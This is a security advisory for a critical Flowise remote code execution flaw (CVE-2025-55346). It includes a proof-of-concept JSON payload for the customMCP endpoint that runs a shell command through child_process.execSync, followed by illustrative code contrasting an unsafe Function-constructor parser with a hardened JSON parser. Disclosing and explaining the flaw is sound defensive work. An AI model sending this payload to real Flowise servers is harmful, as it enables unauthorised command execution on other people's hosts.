
JFSA-2025-001379925 - Flowise JS injection remote code execution

CVE-2025-55346 | CVSS 9.8

JFrog Severity: critical

Discovered by Assaf Levkovich of the JFrog Security Research Team

Published 14 Aug, 2025 | Last updated 14 Aug, 2025

Unintended dynamic code execution leads to remote code execution by network attackers

flowise


User-controlled input flows to an unsafe implementation of a dynamic Function constructor, allowing network attackers to run arbitrary unsandboxed JS code in the context of the host, by sending a simple POST request. Depending on the version of Flowise this could lead to either unauthenticated or authenticated remote code execution.

Send the following payload to the node-load-method/customMCP API endpoint:

{
    "inputs":
    {
        "mcpServerConfig": "(global.process.mainModule.require('child_process').execSync('touch /tmp/foo'))"
    },
    "loadMethod": "listActions"
}
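As an added illustration (not code from Flowise or from the advisory), the unsafe dynamic Function constructor pattern described above is shown beside a hardened parser that treats mcpServerConfig strictly as JSON data. The function names, the allowed config keys and the sample inputs are assumptions constructed for this example; the real Flowise code is not reproduced here.

```javascript
// Constructed illustration of the vulnerability class in this advisory.
// parseConfigUnsafe assumes the server turned the mcpServerConfig string into
// an object with a Function constructor; parseConfigSafe is the hardened form.

// Unsafe: new Function() compiles the string as JavaScript, so any expression
// inside it executes with the privileges of the server process.
function parseConfigUnsafe(configString) {
  return new Function('return (' + configString + ')')();
}

// Hardened: JSON.parse only ever yields data, never executable code. The
// result must be a plain object and may only carry known keys (assumed names).
const ALLOWED_KEYS = new Set(['command', 'args', 'env', 'url']);

function parseConfigSafe(configString) {
  let parsed;
  try {
    parsed = JSON.parse(configString);
  } catch (e) {
    throw new Error('mcpServerConfig must be valid JSON');
  }
  if (parsed === null || typeof parsed !== 'object' || Array.isArray(parsed)) {
    throw new Error('mcpServerConfig must be a JSON object');
  }
  for (const key of Object.keys(parsed)) {
    if (!ALLOWED_KEYS.has(key)) {
      throw new Error('unexpected key in mcpServerConfig: ' + key);
    }
  }
  return parsed;
}

// Request handler shaped like the body in the advisory ({inputs, loadMethod}):
// returns 'accepted' when the config is pure data, 'rejected' otherwise.
function handleLoadMethod(body) {
  try {
    parseConfigSafe(body.inputs.mcpServerConfig);
    return 'accepted';
  } catch (e) {
    return 'rejected';
  }
}

// Constructed sample inputs: a benign data-only config, and an arithmetic
// expression standing in for "code rather than data" (not a payload).
const benignConfig = JSON.stringify({ command: 'npx', args: ['-y', 'example-mcp-server'] });
const codeExpression = '(1 + 1)';

console.log(handleLoadMethod({ inputs: { mcpServerConfig: benignConfig }, loadMethod: 'listActions' }));
console.log(handleLoadMethod({ inputs: { mcpServerConfig: codeExpression }, loadMethod: 'listActions' }));
```

The unsafe parser evaluates the expression and returns 2, while the hardened parser rejects the same string because it is not JSON; the same rejection applies to any string that is JavaScript rather than data.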

No mitigations are supplied for this issue
